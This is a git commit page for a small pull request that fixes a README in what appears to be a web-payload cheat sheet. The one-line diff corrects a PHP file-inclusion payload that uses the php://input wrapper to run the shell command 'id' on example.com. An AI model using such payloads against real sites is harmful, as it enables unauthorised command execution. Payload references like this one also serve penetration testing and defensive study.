Merge pull request #30 from m-veljkovic/master

Update README.md
This commit is contained in:
Swissky 2018-11-19 14:01:44 +01:00 committed by GitHub
commit 0309a2efbd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -186,7 +186,7 @@ Specify your payload in the POST parameters
```powershell
http://example.com/index.php?page=php://input
POST DATA: <? system('id'); ?>
POST DATA: <?php system('id'); ?>
```
### Wrapper phar://